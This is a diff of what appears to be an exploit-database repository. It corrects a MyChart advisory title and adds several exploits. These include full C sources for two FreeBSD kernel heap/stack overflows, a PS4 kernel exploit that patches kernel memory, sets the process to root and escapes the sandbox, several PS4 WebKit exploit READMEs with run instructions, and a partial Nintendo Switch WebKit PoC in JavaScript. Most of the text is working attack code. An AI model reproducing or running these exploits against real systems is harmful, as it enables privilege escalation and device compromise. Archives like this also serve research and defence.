diff --git a/exploits/asp/webapps/44098.txt b/exploits/asp/webapps/44098.txt
index f5335c893..58c68d2f7 100644
--- a/exploits/asp/webapps/44098.txt
+++ b/exploits/asp/webapps/44098.txt
@@ -1,4 +1,4 @@
-# Exploit Title: Epic Systems Corporation MyChart SQL Injection
+# Exploit Title: Epic Systems Corporation MyChart X-Path Injection
 # Google Dork: MyChart® licensed from Epic Systems Corporation
 # Date: 8/19/16
 # Exploit Author: Shayan Sadigh (http://threat.tevora.com/author/shayan/)
@@ -10,7 +10,7 @@
 
 Epic Systems Corporation MyChart "is a web portal offered by most Epic healthcare organizations that gives you controlled access to the same Epic medical records your doctors use and provides convenient self-service functions that reduce costs and increase satisfaction."
 
-The MyChart software uses Intersystems Caché for its DBMS and contains a pre-authenticated SQL injection due to the lack of sanatization for the GE parameter "topic".
+The MyChart software contains an X-Path injection due to the lack of sanitization for the GE parameter "topic". A remote attacker can access contents of an XML document containing static display strings, such as field labels, via the topic parameter to help.asp.
 
 EPIC was quick to respond to contact and patch the vulnerability in MyChart.
 
diff --git a/exploits/freebsd_x86-64/dos/44211.c b/exploits/freebsd_x86-64/dos/44211.c
new file mode 100644
index 000000000..7800fdffa
--- /dev/null
+++ b/exploits/freebsd_x86-64/dos/44211.c
@@ -0,0 +1,109 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <stddef.h>
+#include <string.h>
+#include <errno.h>
+#include <unistd.h>
+#include <sys/ioctl.h>
+#include <sys/kbio.h>
+#include <sys/types.h>
+#include <sys/mman.h>
+#include <sys/param.h>
+#include <sys/linker.h>
+
+int (*kprintf)(const char *fmt, ...);
+char *ostype;
+
+uint64_t originalRip;
+uint64_t originalRbp;
+
+void *resolve(char *name) {
+	struct kld_sym_lookup ksym;
+	
+	ksym.version = sizeof(ksym);
+	ksym.symname = name;
+	
+	if(kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
+		perror("kldsym");
+		exit(1);
+	}
+	
+	printf("  [+] Resolved %s to %#lx\n", ksym.symname, ksym.symvalue);
+	return (void *)ksym.symvalue;
+}
+
+void payload(void) {
+	kprintf("  [+] Entered kernel payload\n");
+	
+	strcpy(ostype, "CTurt  ");
+	
+	__asm__ volatile("swapgs; sysret");
+}
+
+// Copy the stack onto the heap
+void heapOverflow(int index, size_t size) {
+	fkeyarg_t fkey;
+	
+	fkey.keynum = index;
+	fkey.flen = size;
+	memset(&fkey.keydef, 0, 16);
+	
+	ioctl(0, SETFKEY, &fkey);
+}
+
+// Copy the heap onto the stack
+void stackOverflow(int index) {
+	fkeyarg_t fkey;
+	
+	fkey.keynum = index;
+	fkey.flen = 16;
+	memset(&fkey.keydef, 0, 16);
+	
+	ioctl(0, GETFKEY, &fkey);
+}
+
+int main(void) {
+	int result, i;
+	fkeyarg_t fkey;
+	
+	uint32_t ripLower4 = 0x808312cd; // jmp rbp
+	uint64_t rbp = (uint64_t)payload;
+	
+	
+	kprintf = resolve("printf");
+	ostype = resolve("ostype");
+	
+	
+	printf("  [+] Set full length for key 10\n");
+	fkey.keynum = 10;
+	fkey.flen = 16;
+	ioctl(0, SETFKEY, &fkey);
+	
+	
+	printf("  [+] Set bad length and perform heap overflow\n");
+	heapOverflow(0, 128 - offsetof(fkeyarg_t, keydef) + 8 + 0x30 + sizeof(ripLower4));
+	
+	
+	printf("  [+] Prepare stack overflow memory\n");
+	fkey.keynum = 10;
+	fkey.flen = 16;
+	ioctl(0, GETFKEY, &fkey);
+	originalRbp = *(uint64_t *)((char *)&fkey.keydef + 4);
+	originalRip = 0xffffffff00000000 | *(uint32_t *)((char *)&fkey.keydef + 12);
+	
+	printf("  [+] Original rip: %#lx\n", originalRip);
+	printf("  [+] Original rbp: %#lx\n", originalRbp);
+	
+	*(uint64_t *)((char *)&fkey.keydef + 4) = rbp;
+	*(uint32_t *)((char *)&fkey.keydef + 12) = ripLower4;
+	ioctl(0, SETFKEY, &fkey);
+	
+	
+	printf("  [+] Trigger stack overflow\n");
+	fflush(stdout);
+	
+	stackOverflow(0);
+	
+	
+	return 0;
+}
\ No newline at end of file
diff --git a/exploits/freebsd_x86-64/dos/44212.c b/exploits/freebsd_x86-64/dos/44212.c
new file mode 100644
index 000000000..33cc74da6
--- /dev/null
+++ b/exploits/freebsd_x86-64/dos/44212.c
@@ -0,0 +1,159 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/param.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/param.h>
+#include <sys/linker.h>
+
+void *(*ata_get_xport)(void);
+int (*kprintf)(const char *fmt, ...);
+char *ostype;
+
+void *resolve(char *name) {
+	struct kld_sym_lookup ksym;
+	
+	ksym.version = sizeof(ksym);
+	ksym.symname = name;
+	
+	if(kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
+		perror("kldsym");
+		exit(1);
+	}
+	
+	printf("  [+] Resolved %s to %#lx\n", ksym.symname, ksym.symvalue);
+	return (void *)ksym.symvalue;
+}
+
+void dummy(void) { 
+}
+
+void payload(void) {
+	kprintf("  [+] Entered kernel payload\n");
+	
+	strcpy(ostype, "CTurt  ");
+}
+
+#define INFO_SIZE 0
+#define INFO_LIMIT 1
+#define INFO_USED 2
+#define INFO_FREE 3
+#define INFO_REQ 4
+#define INFO_FAIL 5
+
+int getZoneInfo(char *zname, int i) {
+	#define BUF_SIZE 256
+	#define LINE_SIZE 56
+	
+	unsigned int info[6] = { 0 };
+	FILE *fp = NULL;
+	char buf[BUF_SIZE];
+	char iname[LINE_SIZE];
+	
+	fp = popen("/usr/bin/vmstat -z", "r");
+	
+	if(fp == NULL) {
+		perror("popen");
+		exit(1);
+	}
+	
+	memset(buf, 0, sizeof(buf));
+	memset(iname, 0, sizeof(iname));
+	
+	while(fgets(buf, sizeof(buf) - 1, fp) != NULL) {
+		sscanf(buf, "%s %u, %u, %u, %u, %u, %u\n", iname, &info[INFO_SIZE], &info[INFO_LIMIT],
+			&info[INFO_USED], &info[INFO_FREE], &info[INFO_REQ], &info[INFO_FAIL]);
+		
+		if(strncmp(iname, zname, strlen(zname)) == 0 && iname[strlen(zname)] == ':') {
+			break;
+		}
+	}
+	
+	pclose(fp);
+	return info[i];
+}
+
+void craftCorruptedZone(void *zone) {
+	void **uz_slab = (void **)(zone + 200);
+	void **uz_dtor = (void **)(zone + 216);
+	void **uz_fini = (void **)(zone + 232);
+	void **uz_import = (void **)(zone + 240);
+	void **uz_release = (void **)(zone + 248);
+	*uz_slab = dummy;
+	*uz_fini = payload;
+	*uz_import = dummy;
+	*uz_release = dummy;
+}
+
+void craftZone(void *zone) {
+	void **uz_slab = (void **)(zone + 200);
+	void **uz_dtor = (void **)(zone + 216);
+	void **uz_fini = (void **)(zone + 232);
+	void **uz_import = (void **)(zone + 240);
+	void **uz_release = (void **)(zone + 248);
+	
+	// put valid kernel address
+	*uz_slab = ata_get_xport;
+	*uz_fini = ata_get_xport;
+	*uz_import = ata_get_xport;
+	*uz_release = ata_get_xport;
+}
+
+int main(void) {
+	int sock;
+	struct msghdr msg;
+	
+	ata_get_xport = resolve("ata_get_xport");
+	kprintf = resolve("printf");
+	ostype = resolve("ostype");
+	
+	const int previousAllocations = getZoneInfo("mbuf", INFO_USED);
+	
+	const size_t bufferSize = getZoneInfo("mbuf", INFO_SIZE);
+	const size_t overflowSize = previousAllocations * bufferSize + 0x4000;
+	
+	char *mapping, *buffer, *overflow;
+	const size_t copySize = bufferSize + overflowSize;
+	const size_t mappingSize = (copySize + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1);
+	
+	mapping = mmap(NULL, mappingSize + PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
+	munmap(mapping + mappingSize, PAGE_SIZE);
+	
+	buffer = mapping + mappingSize - copySize;
+	overflow = buffer + bufferSize;
+	
+	memset(overflow, 0, overflowSize);
+	
+	// sizeof(struct uma_zone) == 0x300, but since we can't be certain exactly where we overflow from, we will craft at 256 byte intervals
+	for(size_t i = previousAllocations * bufferSize + 0xe0; i < overflowSize - 256; i += 256) {
+		craftCorruptedZone(overflow + i);
+	}
+	
+	sock = socket(AF_INET, SOCK_STREAM, 0);
+	
+	memset(&msg, 0, sizeof(msg));
+	msg.msg_control = buffer;
+	msg.msg_controllen = -1;
+	
+	printf("  [+] Performing overflow\n");
+	sendmsg(sock, &msg, 0);
+	
+	printf("  [+] Triggering payload\n");
+	close(sock);
+	
+	sock = socket(AF_INET, SOCK_STREAM, 0);
+	
+	for(size_t i = previousAllocations * bufferSize + 0xe0; i < overflowSize - 256; i += 256) {
+		craftZone(overflow + i);
+	}
+	
+	printf("  [+] Performing overflow\n");
+	sendmsg(sock, &msg, 0);
+	
+	munmap(mapping, mappingSize);
+	
+	return 0;
+}
\ No newline at end of file
diff --git a/exploits/hardware/dos/44197.md b/exploits/hardware/dos/44197.md
new file mode 100644
index 000000000..e72e6b53a
--- /dev/null
+++ b/exploits/hardware/dos/44197.md
@@ -0,0 +1,28 @@
+PS4 5.01 WebKit Exploit PoC
+===========================
+Based on:
+ - [CVE-2017-7005](https://bugs.chromium.org/p/project-zero/issues/detail?id=1208)
+ - [PegaSwitch](https://github.com/reswitched/pegaswitch) ([Copyright 2017 ReSwitched Team](https://github.com/reswitched/pegaswitch/blob/master/LICENSE.md))
+ - 4.0x exploit by [qwertyoruiopz](https://twitter.com/qwertyoruiopz)
+
+
+> This exploit supports 5.01 (maybe others)!
+			
+Installation
+============
+
+1. Install the latest version of node from [nodejs.org](https://nodejs.org)
+2. Clone this repository
+3. Run `npm install`
+
+Usage
+=====
+
+1. Run `npm start`
+
+License
+=======
+
+MIT License. See attached `LICENSE.md` file.
+
+Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44197.zip
\ No newline at end of file
diff --git a/exploits/bsd/local/43397.md b/exploits/hardware/local/43397.md
similarity index 100%
rename from exploits/bsd/local/43397.md
rename to exploits/hardware/local/43397.md
diff --git a/exploits/bsd/local/44177.c b/exploits/hardware/local/44177.c
similarity index 100%
rename from exploits/bsd/local/44177.c
rename to exploits/hardware/local/44177.c
diff --git a/exploits/hardware/local/44198.md b/exploits/hardware/local/44198.md
new file mode 100644
index 000000000..ec9cf9d8c
--- /dev/null
+++ b/exploits/hardware/local/44198.md
@@ -0,0 +1,29 @@
+PS4 4.0x Code Execution
+==============
+This repo is my edit of the [4.0x webkit exploit](http://rce.party/ps4/) released by [qwertyoruiopz](https://twitter.com/qwertyoruiopz). The edit re-organizes, comments, and adds portability across 3.50 - 4.07 (3.50, 3.55, 3.70, 4.00, and of course 4.06/4.07). The commenting and reorganization was mostly for my own learning experience, however hopefully others can find these comments helpful and build on them or even fix them if I've made mistakes. The exploit is much more stable than FireKaku and sets up the foundation for running basic ROP chains and returns to normal execution. Credit for the exploit goes completely to qwertyoruiopz.
+
+Organization
+==============
+Files in order by name alphabetically;
+* expl.js - Contains the heart of the exploit and establishes a read/write primitive.
+* gadgets.js - Contains gadget maps and function stub maps for a variety of firmwares. Which map is used is determined in the post-exploitation phase.
+* index.html - The main page for the exploit. Launches the exploit and contains post-exploitation stuff, as well as output and code execution.
+* rop.js - Contains the ROP framework modified from Qwerty's original exploit as well as the array in which module base addresses are held and gadget addresses are calculated.
+* syscalls.js - Contains a system call map for a variety of firmwares as well as a 'name -> number' map for syscall ID's.
+
+Usage
+==============
+Simply setup a web-server on localhost using xampp or any other program and setup these files in a directory. You can then go to your computer's local IPv4 address (found by running ipconfig in cmd.exe) and access the exploit.
+
+Notes
+==============
+* The exploit is pretty stable but will still sometimes crash. If the browser freezes simply back out and retry, if a segmentation fault (identified by prompt "You do not have enough free system memory") occurs, refresh the page before trying again as it seems to lead to better results.
+* This only allows code execution in ring3, to get ring0 execution a kernel exploit and KROP chain is needed.
+* If I've made an error (particularily having to do with firmware compatibility and gadgets) feel free to open an issue on the repo.
+* The exploit has been tested on 3.55 and 4.00, it is assumed to work on other firmwares listed but not guaranteed, again if you encounter a problem - open an issue on the repo.
+
+Credits
+==============
+qwertyoruiopz - The original exploit, the likes of which can be found [here](http://rce.party/ps4/).
+
+Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44198.zip
\ No newline at end of file
diff --git a/exploits/hardware/local/44199.md b/exploits/hardware/local/44199.md
new file mode 100644
index 000000000..468d20a4b
--- /dev/null
+++ b/exploits/hardware/local/44199.md
@@ -0,0 +1,83 @@
+PS4 3.55 Unsigned Code Execution
+==============
+This GitHub Repository contains all the necessary tools for getting PoC Unsigned Code Execution on a Sony PS4 System with firmwares 3.15, 3.50 and 3.55. <br />
+This Exploit, is based-off [Henkaku's](https://henkaku.xyz/) WebKit Vulnerability for the Sony's PSVita. <br />
+It includes basic ROP and is able to return to normal execution. <br />
+
+Pre-Requisites:
+==============
+1. A PC
+  1. Running Windows, macOS or Linux
+  2. A already set up basic server where the PS4 User's Guide launcher will point for loading the payload
+  3. [Python](https://www.python.org/downloads/) 2.7.X
+    * Python 3.X gives problems, since they included major changes on the syntax and on the libraries in comparison with 2.7
+2. A Sony PlayStation 4
+  1. Running the following firmwares:
+    * 3.15, 3.50 or 3.55
+3. Internet Connection (PS4 and PC directly wired to the Router is the mostly preferred option)
+
+Usage:
+==============
+There are two different methods to execute the Exploit, but first let's clarify how we will know which one to use. <br />
+If your PlayStation 4 has got an already set-up PlayStation Network Account on it, you should use method 1. <br />
+Else, if your PlayStation 4 -NEVER- had a PlayStation Network Account on it, you should use method 2. <br />
+Probably you will ask why, it's pretty much easy to explain and understand: <br />
+When you buy a PS4, comes unactivated, meaning that nobody has entered SEN Account on it. (Method 2) <br />
+Once you use a SEN Account on it, the PS4 becomes an activated console. (Method 1) <br />
+This doesn't affect the actual payload, but you should take in mind which method use. <br />
+
+Method 1:
+==============
+Run this command on the folder you've downloaded this repo: <br />
+`python server.py` <br />
+All the debug options will be outputted during the Exploit process. <br />
+Navigate to your PS4's Web Browser and simply type on the adress bar, your PC's IP Adress. <br />
+Wait until the exploit finishes, once it does, PS4 will return to it's normal state. <br />
+An example of what will look like found [HERE](https://gist.github.com/Fire30/2e0ea2d73d3a1f6f95d80aea77b75df8). <br />
+
+Method 2:
+==============
+A dns.conf file which is present on the source, needs to be edited accordingly your local PC's IP Adress. <br />
+PlayStation 4's DNS Settings must be changed in order to point the PC's IP Adress where the Exploit is located. <br />
+Once you've edited the dns.conf file, simply run the next command on the folder where you downloaded this repo: <br />
+`python fakedns.py -c dns.conf` <br />
+And then: <br />
+`python server.py` <br />
+All the debug options will be outputted during the Exploit process. <br />
+Once Python part is done, get into your PlayStation 4, navigate to the User's Guide page and wait until exploit finishes out. <br />
+An example of what will look like found [HERE](https://gist.github.com/Fire30/2e0ea2d73d3a1f6f95d80aea77b75df8). <br />
+
+Miscellaneous:
+==============
+If you want to try the socket test, change the IP Address located at the bottom of the ps4sploit.html file with your computer's one and run this command: <br />
+`netcat -l 0.0.0.0 8989 -v`  <br />
+You should see something like: <br />
+```
+Listening on [0.0.0.0] (family 0, port 8989)
+Connection from [192.168.1.72] port 8989 [tcp/sunwebadmins] accepted (family 2, sport 59389)
+Hello From a PS4!
+```
+Notes about this exploit:
+==============
+* Currently, the exploit does not work 100%, but is around 80% which is fine for our purposes. <br />
+* Although it is confirmed to work, sometimes will fail, just wait some seconds and re-run the payload. <br />
+* Performing too much memory allocation after sort() is called, can potentially lead to more instability and it may crash more. <br />
+* The process will crash after the ROP payload is done executing. <br />
+* This is only useful for researchers. There are many many more steps needed before this becomes useful to normal users. <br />
+
+Acknowledgements
+================
+xyz - Much of the code is based off of his code used for the Henkaku project  
+Anonymous contributor - WebKit Vulnerability PoC  
+CTurt - I basically copied his JuSt-ROP idea  
+xerpi - Used his idea for the socket code  
+rck\`d - Finding bugs such as not allocating any space for a stack on function calls  
+Maxton - 3.50 support and various cleanup  
+Thunder07 - 3.15 support
+
+
+Contributing
+================
+The code currently is a bit of a mess, so if you have any improvements feel free to send a pull request or make an issue. Also I am perfectly fine if you want to fork and create your own project.
+
+Download:
\ No newline at end of file
diff --git a/exploits/hardware/local/44200.md b/exploits/hardware/local/44200.md
new file mode 100644
index 000000000..14f0f2919
--- /dev/null
+++ b/exploits/hardware/local/44200.md
@@ -0,0 +1,21 @@
+CVE 2014-1303 Proof Of Concept for PS4
+==============
+This repository contains a poc for the CVE 2014-1303 originally disclosed by Liang Chen. It has been tested to work on system firmware 2.03, but should work for systems on a firmware < 2.50, the ROP test will however only work on 2.03.
+
+Usage
+==============
+You need to edit the dns.conf to point to the ip address of your machine, and modify your consoles dns settings to point to it as well. Then run  
+`python fakedns.py -c dns.conf`  
+then  
+`python server.py`  
+Debug output will come from this process.  
+
+Navigate to the User's Guide page on the PS4 and various information should be printed to the console. The ROP test will print what is stored in the rsp register. Continuing execution after rsp is pivoted still needs to be done.
+
+Acknowledgements
+================
+Liang Chen  
+thexyz  
+dreadlyei
+
+Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44200.zip
\ No newline at end of file
diff --git a/exploits/hardware/local/44206.c b/exploits/hardware/local/44206.c
new file mode 100644
index 000000000..5c0a271dd
--- /dev/null
+++ b/exploits/hardware/local/44206.c
@@ -0,0 +1,274 @@
+/*
+	Code written based on info available here http://cturt.github.io/dlclose-overflow.html
+
+	See attached LICENCE file
+	Thanks to CTurt and qwertyoruiop
+
+	- @kr105rlz
+
+Download: //github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44206.zip
+*/
+
+#include "ps4.h"
+
+#define DEBUG_SOCKET
+#include "defines.h"
+
+static int sock;
+static void *dump;
+
+void payload(struct knote *kn) {
+	struct thread *td;
+	struct ucred *cred;
+
+	// Get td pointer
+	asm volatile("mov %0, %%gs:0" : "=r"(td));
+
+	// Enable UART output
+	uint16_t *securityflags = (uint16_t*)0xFFFFFFFF833242F6;
+	*securityflags = *securityflags & ~(1 << 15); // bootparam_disable_console_output = 0
+
+	// Print test message to the UART line
+	printfkernel("\n\n\n\n\n\n\n\n\nHello from kernel :-)\n\n\n\n\n\n\n\n\n");
+
+	// Disable write protection
+	uint64_t cr0 = readCr0();
+	writeCr0(cr0 & ~X86_CR0_WP);
+	
+	// sysctl_machdep_rcmgr_debug_menu and sysctl_machdep_rcmgr_store_moe
+	*(uint16_t *)0xFFFFFFFF82607C46 = 0x9090;
+	*(uint16_t *)0xFFFFFFFF82607826 = 0x9090;
+	
+	*(char *)0xFFFFFFFF8332431A = 1;
+	*(char *)0xFFFFFFFF83324338 = 1;
+	
+	// Restore write protection
+	writeCr0(cr0);
+	
+	// Resolve creds
+	cred = td->td_proc->p_ucred;
+
+	// Escalate process to root
+	cred->cr_uid = 0;
+	cred->cr_ruid = 0;
+	cred->cr_rgid = 0;
+	cred->cr_groups[0] = 0;
+
+	void *td_ucred = *(void **)(((char *)td) + 304); // p_ucred == td_ucred
+	
+	// sceSblACMgrIsSystemUcred
+	uint64_t *sonyCred = (uint64_t *)(((char *)td_ucred) + 96);
+	*sonyCred = 0xffffffffffffffff;
+	
+	// sceSblACMgrGetDeviceAccessType
+	uint64_t *sceProcType = (uint64_t *)(((char *)td_ucred) + 88);
+	*sceProcType = 0x3801000000000013; // Max access
+	
+	// sceSblACMgrHasSceProcessCapability
+	uint64_t *sceProcCap = (uint64_t *)(((char *)td_ucred) + 104);
+	*sceProcCap = 0xffffffffffffffff; // Sce Process
+	
+	((uint64_t *)0xFFFFFFFF832CC2E8)[0] = 0x123456; //priv_check_cred bypass with suser_enabled=true
+	((uint64_t *)0xFFFFFFFF8323DA18)[0] = 0; // bypass priv_check
+
+	// Jailbreak ;)
+	cred->cr_prison = (void *)0xFFFFFFFF83237250; //&prison0
+
+	// Break out of the sandbox
+	void *td_fdp = *(void **)(((char *)td->td_proc) + 72);
+	uint64_t *td_fdp_fd_rdir = (uint64_t *)(((char *)td_fdp) + 24);
+	uint64_t *td_fdp_fd_jdir = (uint64_t *)(((char *)td_fdp) + 32);
+	uint64_t *rootvnode = (uint64_t *)0xFFFFFFFF832EF920;
+	*td_fdp_fd_rdir = *rootvnode;
+	*td_fdp_fd_jdir = *rootvnode;
+}
+
+// Perform kernel allocation aligned to 0x800 bytes
+int kernelAllocation(size_t size, int fd) {
+	SceKernelEqueue queue = 0;
+	sceKernelCreateEqueue(&queue, "kexec");
+
+	sceKernelAddReadEvent(queue, fd, 0, NULL);
+
+	return queue;
+}
+
+void kernelFree(int allocation) {
+	close(allocation);
+}
+
+void *exploitThread(void *none) {
+	printfsocket("[+] Entered exploitThread\n");
+
+	uint64_t bufferSize = 0x8000;
+	uint64_t overflowSize = 0x8000;
+	uint64_t copySize = bufferSize + overflowSize;
+	
+	// Round up to nearest multiple of PAGE_SIZE
+	uint64_t mappingSize = (copySize + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1);
+	
+	uint8_t *mapping = mmap(NULL, mappingSize + PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
+	munmap(mapping + mappingSize, PAGE_SIZE);
+	
+	uint8_t *buffer = mapping + mappingSize - copySize;
+	
+	int64_t count = (0x100000000 + bufferSize) / 4;
+
+	// Create structures
+	struct knote kn;
+	struct filterops fo;
+	struct knote **overflow = (struct knote **)(buffer + bufferSize);
+	overflow[2] = &kn;
+	kn.kn_fop = &fo;
+
+	// Setup trampoline to gracefully return to the calling thread
+	void *trampw = NULL;
+	void *trampe = NULL;
+	int executableHandle;
+	int writableHandle;
+	uint8_t trampolinecode[] = {
+		0x58, // pop rax
+		0x48, 0xB8, 0x19, 0x39, 0x40, 0x82, 0xFF, 0xFF, 0xFF, 0xFF, // movabs rax, 0xffffffff82403919
+		0x50, // push rax
+		0x48, 0xB8, 0xBE, 0xBA, 0xAD, 0xDE, 0xDE, 0xC0, 0xAD, 0xDE, // movabs rax, 0xdeadc0dedeadbabe
+		0xFF, 0xE0 // jmp rax
+	};
+
+	// Get Jit memory
+	sceKernelJitCreateSharedMemory(0, PAGE_SIZE, PROT_CPU_READ | PROT_CPU_WRITE | PROT_CPU_EXEC, &executableHandle);
+	sceKernelJitCreateAliasOfSharedMemory(executableHandle, PROT_CPU_READ | PROT_CPU_WRITE, &writableHandle);
+
+	// Map r+w & r+e
+	trampe = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_EXEC, MAP_SHARED, executableHandle, 0);
+	trampw = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_TYPE, writableHandle, 0);
+
+	// Copy trampoline to allocated address
+	memcpy(trampw, trampolinecode, sizeof(trampolinecode));	
+	*(void **)(trampw + 14) = (void *)payload;
+
+	// Call trampoline when overflown
+	fo.f_detach = trampe;
+
+	// Start the exploit
+	int sockets[0x2000];
+	int allocation[50], m = 0, m2 = 0;
+	int fd = (bufferSize - 0x800) / 8;
+
+	printfsocket("[+] Creating %d sockets\n", fd);
+
+	// Create sockets
+	for(int i = 0; i < 0x2000; i++) {
+		sockets[i] = sceNetSocket("sss", AF_INET, SOCK_STREAM, 0);
+		if(sockets[i] >= fd) {
+			sockets[i + 1] = -1;
+			break;
+		}
+	}
+
+	// Spray the heap
+	for(int i = 0; i < 50; i++) {
+		allocation[i] = kernelAllocation(bufferSize, fd);
+		printfsocket("[+] allocation = %llp\n", allocation[i]);
+	}
+
+	// Create hole for the system call's allocation
+	m = kernelAllocation(bufferSize, fd);
+	m2 = kernelAllocation(bufferSize, fd);
+	kernelFree(m);
+
+	// Perform the overflow
+	int result = syscall(597, 1, mapping, &count);
+	printfsocket("[+] Result: %d\n", result);
+
+	// Execute the payload
+	printfsocket("[+] Freeing m2\n");
+	kernelFree(m2);
+	
+	// Close sockets
+	for(int i = 0; i < 0x2000; i++) {
+		if(sockets[i] == -1)
+			break;
+		sceNetSocketClose(sockets[i]);
+	}
+	
+	// Free allocations
+	for(int i = 0; i < 50; i++) {
+		kernelFree(allocation[i]);
+	}
+	
+	// Free the mapping
+	munmap(mapping, mappingSize);
+	
+	return NULL;
+}
+
+int _main(void) {
+	ScePthread thread;
+
+	initKernel();	
+	initLibc();
+	initNetwork();
+	initJIT();
+	initPthread();
+
+#ifdef DEBUG_SOCKET
+	struct sockaddr_in server;
+
+	server.sin_len = sizeof(server);
+	server.sin_family = AF_INET;
+	server.sin_addr.s_addr = IP(192, 168, 0, 4);
+	server.sin_port = sceNetHtons(9023);
+	memset(server.sin_zero, 0, sizeof(server.sin_zero));
+	sock = sceNetSocket("debug", AF_INET, SOCK_STREAM, 0);
+	sceNetConnect(sock, (struct sockaddr *)&server, sizeof(server));
+	
+	int flag = 1;
+	sceNetSetsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (char *)&flag, sizeof(int));
+	
+	dump = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
+#endif
+
+	printfsocket("[+] Starting...\n");
+	printfsocket("[+] UID = %d\n", getuid());
+	printfsocket("[+] GID = %d\n", getgid());
+
+	// Create exploit thread
+	if(scePthreadCreate(&thread, NULL, exploitThread, NULL, "exploitThread") != 0) {
+		printfsocket("[-] pthread_create error\n");
+		return 0;
+	}
+
+	// Wait for thread to exit
+	scePthreadJoin(thread, NULL);
+
+	// At this point we should have root and jailbreak
+	if(getuid() != 0) {
+		printfsocket("[-] Kernel patch failed!\n");
+		sceNetSocketClose(sock);
+		return 1;
+	}
+
+	printfsocket("[+] Kernel patch success!\n");
+
+	// Enable debug menu
+	int (*sysctlbyname)(const char *name, void *oldp, size_t *oldlenp, const void *newp, size_t newlen) = NULL;
+	RESOLVE(libKernelHandle, sysctlbyname);
+	
+	uint32_t enable;
+	size_t size;
+	
+	enable = 1;
+	size = sizeof(enable);
+	
+	sysctlbyname("machdep.rcmgr_utoken_store_mode", NULL, NULL, &enable, size);
+	sysctlbyname("machdep.rcmgr_debug_menu", NULL, NULL, &enable, size);
+	
+#ifdef DEBUG_SOCKET
+	munmap(dump, PAGE_SIZE);	
+#endif
+	
+	printfsocket("[+] bye\n");
+	sceNetSocketClose(sock);
+	
+	return 0;
+}
\ No newline at end of file
diff --git a/exploits/hardware/local/44213.html b/exploits/hardware/local/44213.html
new file mode 100644
index 000000000..ebec11b68
--- /dev/null
+++ b/exploits/hardware/local/44213.html
@@ -0,0 +1,218 @@
+<!doctype html>
+<html>
+    <head>
+        <title>CVE-2016-4657 Switch PoC</title>
+        <style>
+            body {font-size: 2em;}
+            a {text-decoration: none; color: #000;}
+            a:hover {color: #f00; font-weight: bold;}
+        </style>
+    </head>
+    <body>
+        <h1>CVE-2016-4657 Nintendo Switch PoC</h1>
+        <ul>
+            <li><a href=\'javascript:go();\'> go!</a></li>
+            <li><a href=\'javascript:document.location.reload();\'> reload</a></li>
+        </ul>
+        <div id=\'status\'> waiting... click go.</div>
+
+            <script>
+                // display JS errors as alerts. Helps debugging.
+                window.onerror = function(error, url, line) {
+                    alert(error+\' URL:\'+url+\' L:\'+line);
+                };
+            </script>
+            <script>
+
+                // based on jbme.qwertyoruiop.com
+                // Thanks to:
+                //  + qwertyoruiop
+                //  + Retr0id
+                //  + Ando
+                //
+                // saelo\'s phrack article is invaluable: http://www.phrack.org/papers/attacking_javascript_engines.html
+
+                // garbage collection stuff
+                var pressure = new Array(100);
+                // do garbage collect
+                dgc = function() {
+                    for (var i = 0; i < pressure.length; i++) {
+                        pressure[i] = new Uint32Array(0x10000);
+                    }
+                    for (var i = 0; i < pressure.length; i++) {
+                        pressure[i] = 0;
+                    }
+                }
+
+
+                // access to the overlapping Uint32Array
+                var bufs = new Array(0x1000);
+                // we will modify the vector of this
+                var smash = new Uint32Array(0x10);
+                // the array with the stale pointer
+                var stale = 0;
+
+                var _dview = null;
+                // write 2x 32bit in a DataView and get the Float representation of it
+                function u2d(low, hi) {
+                    if (!_dview) _dview = new DataView(new ArrayBuffer(16));
+                    _dview.setUint32(0, hi);
+                    _dview.setUint32(4, low);
+                    return _dview.getFloat64(0);
+                }
+
+                function go_() {
+                    // check if the length of the array smash changed already. if yes, bail out.
+                    if (smash.length != 0x10) return;
+
+                    // garbage collect
+                    dgc();
+
+                    // new array with 0x100 elements
+                    var arr = new Array(0x100);
+
+                    // new array buffer of length 0x1000
+                    var yolo = new ArrayBuffer(0x1000);
+
+                    // populate the arr with pointer to yolo and a number. not quite sure why.
+                    arr[0] = yolo;
+                    arr[1] = 0x13371337;
+
+                    // create an object whos toString function returns number 10 and messes with arr.
+                    var not_number = {};
+                    not_number.toString = function() {
+                        arr = null;
+                        props[\"stale\"][\"value\"] = null;
+
+                        // if bufs is already overlapping memory, bail out.
+                        if (bufs[0]) return 10;
+                        // really make sure garbage is collected
+                        // the array pointed at by arr should be gone now.
+                        for (var i = 0; i < 20; i++) {
+                            dgc();
+                        }
+                        // for the whole buf Array
+                        for (i = 0; i < bufs.length; i++) {
+                            // fill it with a lot of Uint32Arrays, hopefully allocated where arr was earlier
+                            bufs[i] = new Uint32Array(0x100 * 2)
+                            // for each element of that array
+                            for (k = 0; k < bufs[i].length;) {
+                                // set memory to 0x41414141 0xffff0000
+                                // basically spraying the JSValue 0xffff000041414141
+                                // which is the Integer 0x41414141
+                                // phrack: Integer FFFF:0000:IIII:IIII
+                                bufs[i][k++] = 0x41414141;
+                                bufs[i][k++] = 0xffff0000;
+                            }
+                        }
+                        return 10;
+                    };
+                    // define a new object with some properties
+                    var props = {
+                        p0: { value: 0 },
+                        p1: { value: 1 },
+                        p2: { value: 2 },
+                        p3: { value: 3 },
+                        p4: { value: 4 },
+                        p5: { value: 5 },
+                        p6: { value: 6 },
